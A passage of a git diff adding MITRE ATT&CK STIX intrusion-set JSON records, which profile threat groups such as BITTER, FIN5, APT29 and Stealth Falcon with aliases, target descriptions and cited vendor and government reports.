at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7f848c02-4d1e-4808-a4ae-4670681370a9.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7f848c02-4d1e-4808-a4ae-4670681370a9.json new file mode 100644 index 0000000000000000000000000000000000000000..779757c391cba3505be39a7bff6d5315aa8c1c73 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7f848c02-4d1e-4808-a4ae-4670681370a9.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--4eef452a-fd53-4890-8f8f-1962a7ab7d9a", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "BITTER", + "T-APT-17" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--7f848c02-4d1e-4808-a4ae-4670681370a9", + "created": "2022-06-01T20:26:53.880Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G1002", + "url": "https://attack.mitre.org/groups/G1002" + }, + { + "source_name": "T-APT-17", + "description": "(Citation: Cisco Talos Bitter Bangladesh May 2022)" + }, + { + "source_name": "Forcepoint BITTER Pakistan Oct 2016", + "url": "https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan", + "description": "Dela Paz, R. (2016, October 21). BITTER: a targeted attack against Pakistan. Retrieved June 1, 2022." + }, + { + "source_name": "Cisco Talos Bitter Bangladesh May 2022", + "url": "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html", + "description": "Raghuprasad, C . (2022, May 11). Bitter APT adds Bangladesh to their targets. Retrieved June 1, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. 
[BITTER](https://attack.mitre.org/groups/G1002) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)", + "modified": "2022-06-01T21:20:18.113Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "BITTER", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--813636db-3939-4a45-bea9-6113e970c029.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--813636db-3939-4a45-bea9-6113e970c029.json new file mode 100644 index 0000000000000000000000000000000000000000..2a35d752100198e3afccaa9795cc7961f4ef1c80 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--813636db-3939-4a45-bea9-6113e970c029.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--189ddd1c-7cba-4a20-be7b-88b02fff7690", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "DarkVishnya" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029", + "type": "intrusion-set", + "created": "2020-05-15T13:07:26.651Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0105", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0105" + }, + { + "source_name": "DarkVishnya", + "description": "(Citation: Securelist DarkVishnya Dec 2018)" + }, + { + "source_name": "Securelist DarkVishnya Dec 2018", + "url": "https://securelist.com/darkvishnya/89169/", + "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020." + } + ], + "modified": "2021-10-12T22:10:04.107Z", + "name": "DarkVishnya", + "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.(Citation: Securelist DarkVishnya Dec 2018)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--85403903-15e0-4f9f-9be4-a259ecad4022.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--85403903-15e0-4f9f-9be4-a259ecad4022.json new file mode 100644 index 0000000000000000000000000000000000000000..28ed81ba5d51b38d21f0f9a9ebb16fcd603058ce --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--85403903-15e0-4f9f-9be4-a259ecad4022.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--5e165d6d-265d-4f03-856a-e38fd6ca8330", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "FIN5" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Walker Johnson" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--85403903-15e0-4f9f-9be4-a259ecad4022", + "type": "intrusion-set", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0053", + "external_id": "G0053" + }, + { + "source_name": "FIN5", + "description": "(Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)" + }, + { + "source_name": "FireEye Respond Webinar July 2017", + "description": "Scavella, T. and Rifki, A. (2017, July 20). Are you Ready to Respond? (Webinar). Retrieved October 4, 2017.", + "url": "https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html" + }, + { + "source_name": "Mandiant FIN5 GrrCON Oct 2016", + "description": "Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.", + "url": "https://www.youtube.com/watch?v=fevGZs0EQu8" + }, + { + "source_name": "DarkReading FireEye FIN5 Oct 2015", + "description": "Higgins, K. (2015, October 13). Prolific Cybercrime Gang Favors Legit Login Credentials. Retrieved October 4, 2017.", + "url": "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?" 
+ } + ], + "modified": "2021-10-16T19:48:37.809Z", + "name": "FIN5", + "description": "[FIN5](https://attack.mitre.org/groups/G0053) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. (Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)", + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--88489675-d216-4884-a98f-49a89fcc1643.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--88489675-d216-4884-a98f-49a89fcc1643.json new file mode 100644 index 0000000000000000000000000000000000000000..6bbdacdd079b893472b664e5de9215a117cd2e5b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--88489675-d216-4884-a98f-49a89fcc1643.json 
@@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--e95bba67-93b0-4ff6-a6c8-1c9370605a93", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Mofang" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643", + "type": "intrusion-set", + "created": "2020-05-12T21:23:59.021Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0103", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0103" + }, + { + "source_name": "FOX-IT May 2016 Mofang", + "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf", + "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020." + } + ], + "modified": "2020-05-29T03:30:39.739Z", + "name": "Mofang", + "description": "[Mofang](https://attack.mitre.org/groups/G0103) is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim's infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.(Citation: FOX-IT May 2016 Mofang)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--88b7dbc2-32d3-4e31-af2f-3fc24e1582d7.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--88b7dbc2-32d3-4e31-af2f-3fc24e1582d7.json new file mode 100644 index 0000000000000000000000000000000000000000..ffe884f1a5d63a97eb82071e212a0180a0732d6b --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--88b7dbc2-32d3-4e31-af2f-3fc24e1582d7.json 
@@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--ae40c50c-f126-48dd-92d4-ba46708854a1", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Lotus Blossom", + "DRAGONFISH", + "Spring Dragon" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--88b7dbc2-32d3-4e31-af2f-3fc24e1582d7", + "type": "intrusion-set", + "created": "2017-05-31T21:32:01.092Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0030", + "external_id": "G0030" + }, + { + "source_name": "Lotus Blossom", + "description": "(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)" + }, + { + "source_name": "DRAGONFISH", + "description": "(Citation: Accenture Dragonfish Jan 2018)" + }, + { + "source_name": "Spring Dragon", + "description": "(Citation: Spring Dragon Jun 2015)(Citation: Accenture Dragonfish Jan 2018)" + }, + { + "url": "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html", + "description": "Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.", + "source_name": "Lotus Blossom Jun 2015" + }, + { + "source_name": "Accenture Dragonfish Jan 2018", + "url": "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", + "description": "Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS\u2019 MEETING AND ASSOCIATES. Retrieved November 14, 2018." + }, + { + "url": "https://securelist.com/the-spring-dragon-apt/70726/", + "description": "Baumgartner, K.. (2015, June 17). The Spring Dragon APT. 
Retrieved February 15, 2016.", + "source_name": "Spring Dragon Jun 2015" + } + ], + "modified": "2019-03-25T14:17:43.218Z", + "name": "Lotus Blossom", + "description": "[Lotus Blossom](https://attack.mitre.org/groups/G0030) is a threat group that has targeted government and military organizations in Southeast Asia. (Citation: Lotus Blossom Jun 2015)", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--894aab42-3371-47b1-8859-a4a074c804c8.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--894aab42-3371-47b1-8859-a4a074c804c8.json new file mode 100644 index 0000000000000000000000000000000000000000..d6ac0437577b5c5be77e753fc11e3c91bd7f0542 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--894aab42-3371-47b1-8859-a4a074c804c8.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--b2acece6-08ac-4b43-998a-d81438be03e0", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Stealth Falcon" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--894aab42-3371-47b1-8859-a4a074c804c8", + "type": "intrusion-set", + "created": "2017-05-31T21:32:06.390Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0038", + "external_id": "G0038" + }, + { + "source_name": "Stealth Falcon", + "description": "(Citation: Citizen Lab Stealth Falcon May 2016)" + }, + { + "source_name": "Citizen Lab Stealth Falcon May 2016", + "description": "Marczak, B. and Scott-Railton, J.. (2016, May 29). Keep Calm and (Don\u2019t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.", + "url": "https://citizenlab.org/2016/05/stealth-falcon/" + } + ], + "modified": "2020-11-23T18:57:19.208Z", + "name": "Stealth Falcon", + "description": "[Stealth Falcon](https://attack.mitre.org/groups/G0038) is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. (Citation: Citizen Lab Stealth Falcon May 2016)", + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542.json new file mode 100644 index 0000000000000000000000000000000000000000..f4c725ea5b427dbaa5ab7fa80d647e32f3c8e6ac --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542.json 
@@ -0,0 +1,247 @@ +{ + "type": "bundle", + "id": "bundle--329bd89f-9890-49ce-875a-e787aee531da", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-16T22:25:01.191Z", + "name": "APT29", + "description": "[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)\n\nIn April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Unit 42 SolarStorm December 2020)", + "aliases": [ + "APT29", + "IRON RITUAL", + "IRON HEMLOCK", + "NobleBaron", + "Dark Halo", + "StellarParticle", + "NOBELIUM", + "UNC2452", + "YTTRIUM", + "The Dukes", + "Cozy Bear", + "CozyDuke", + "SolarStorm", + "Blue Kitsune" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "4.0", + "x_mitre_contributors": [ + "Daniyal 
Naeem, BT Security", + "Matt Brenton, Zurich Insurance Group", + "Katie Nickels, Red Canary", + "Joe Gumke, U.S. Bank" + ], + "type": "intrusion-set", + "id": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "created": "2017-05-31T21:31:52.748Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0016", + "external_id": "G0016" + }, + { + "source_name": "CozyDuke", + "description": "(Citation: Crowdstrike DNC June 2016)" + }, + { + "source_name": "Cozy Bear", + "description": "(Citation: Crowdstrike DNC June 2016)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: CrowdStrike StellarParticle January 2022)" + }, + { + "source_name": "StellarParticle", + "description": "(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: CrowdStrike StellarParticle January 2022)" + }, + { + "source_name": "The Dukes", + "description": "(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)" + }, + { + "source_name": "APT29", + "description": "(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: NCSC APT29 July 2020)(Citation: Cybersecurity Advisory SVR TTP May 2021)" + }, + { + "source_name": "UNC2452", + "description": "(Citation: FireEye SUNBURST Backdoor December 2020)" + }, + { + "source_name": "YTTRIUM", + "description": "(Citation: Microsoft Unidentified Dec 2018)" + }, + { + "source_name": "NOBELIUM", + "description": "(Citation: MSTIC NOBELIUM Mar 2021)(Citation: MSTIC NOBELIUM May 2021)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: MSRC Nobelium June 2021)" + }, + { + "source_name": "Blue Kitsune", + "description": "(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 
2020)" + }, + { + "source_name": "IRON HEMLOCK", + "description": "(Citation: Secureworks IRON HEMLOCK Profile)" + }, + { + "source_name": "IRON RITUAL", + "description": "(Citation: Secureworks IRON RITUAL Profile)" + }, + { + "source_name": "NobleBaron", + "description": "(Citation: SentinelOne NobleBaron June 2021)" + }, + { + "source_name": "SolarStorm", + "description": "(Citation: Unit 42 SolarStorm December 2020)" + }, + { + "source_name": "Dark Halo", + "description": "(Citation: Volexity SolarWinds)" + }, + { + "source_name": "Crowdstrike DNC June 2016", + "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", + "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + }, + { + "source_name": "Volexity SolarWinds", + "description": "Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.", + "url": "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" + }, + { + "source_name": "CrowdStrike SUNSPOT Implant January 2021", + "description": "CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.", + "url": "https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/" + }, + { + "source_name": "CrowdStrike StellarParticle January 2022", + "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.", + "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/" + }, + { + "source_name": "GRIZZLY STEPPE JAR", + "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. 
Retrieved January 11, 2017.", + "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" + }, + { + "source_name": "FireEye APT29 Nov 2018", + "description": "Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + }, + { + "source_name": "ESET Dukes October 2019", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" + }, + { + "source_name": "FireEye SUNBURST Backdoor December 2020", + "description": "FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + }, + { + "source_name": "SentinelOne NobleBaron June 2021", + "description": "Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.", + "url": "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/" + }, + { + "source_name": "Microsoft Unidentified Dec 2018", + "description": "Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. 
think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.", + "url": "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/" + }, + { + "source_name": "MSTIC NOBELIUM May 2021", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/" + }, + { + "source_name": "MSRC Nobelium June 2021", + "description": "MSRC. (2021, June 25). New Nobelium activity. Retrieved August 4, 2021.", + "url": "https://msrc-blog.microsoft.com/2021/06/25/new-nobelium-activity/" + }, + { + "source_name": "MSTIC Nobelium Toolset May 2021", + "description": "MSTIC. (2021, May 28). Breaking down NOBELIUM\u2019s latest early-stage toolset. Retrieved August 4, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/" + }, + { + "source_name": "MSTIC NOBELIUM Mar 2021", + "description": "Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM\u2019s layered persistence. Retrieved March 8, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/" + }, + { + "source_name": "NCSC APT29 July 2020", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf" + }, + { + "source_name": "Cybersecurity Advisory SVR TTP May 2021", + "description": "NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. 
Retrieved July 29, 2021.", + "url": "https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf" + }, + { + "source_name": "NSA Joint Advisory SVR SolarWinds April 2021", + "description": "NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.", + "url": "https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF" + }, + { + "source_name": "PWC WellMess C2 August 2020", + "description": "PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html" + }, + { + "source_name": "PWC WellMess July 2020", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html" + }, + { + "source_name": "Secureworks IRON HEMLOCK Profile", + "description": "Secureworks CTU. (n.d.). IRON HEMLOCK. Retrieved February 22, 2022.", + "url": "http://www.secureworks.com/research/threat-profiles/iron-hemlock" + }, + { + "source_name": "Secureworks IRON RITUAL Profile", + "description": "Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-ritual" + }, + { + "source_name": "UK Gov Malign RIS Activity April 2021", + "description": "UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.", + "url": "https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services" + }, + { + "source_name": "UK Gov UK Exposes Russia SolarWinds April 2021", + "description": "UK Gov. 
(2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.", + "url": "https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise" + }, + { + "source_name": "UK NSCS Russia SolarWinds April 2021", + "description": "UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.", + "url": "https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise" + }, + { + "source_name": "Unit 42 SolarStorm December 2020", + "description": "Unit 42. (2020, December 23). SolarStorm Supply Chain Attack Timeline. Retrieved March 24, 2023.", + "url": "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/" + }, + { + "source_name": "White House Imposing Costs RU Gov April 2021", + "description": "White House. (2021, April 15). Imposing Costs for Harmful Foreign Activities by the Russian Government. Retrieved April 16, 2021.", + "url": "https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12.json new file mode 100644 index 0000000000000000000000000000000000000000..c3c29927b494fc5817c933e538d95cc28f52aca6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--ff11f165-ddf4-49eb-a0d1-ab6cfbf38e7b", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Dark Caracal" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12", + "type": "intrusion-set", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0070", + "external_id": "G0070" + }, + { + "source_name": "Dark Caracal", + "description": "(Citation: Lookout Dark Caracal Jan 2018)" + }, + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2021-10-11T19:08:18.503Z", + "name": "Dark Caracal", + "description": "[Dark Caracal](https://attack.mitre.org/groups/G0070) is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. (Citation: Lookout Dark Caracal Jan 2018)", + "x_mitre_version": "1.3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git 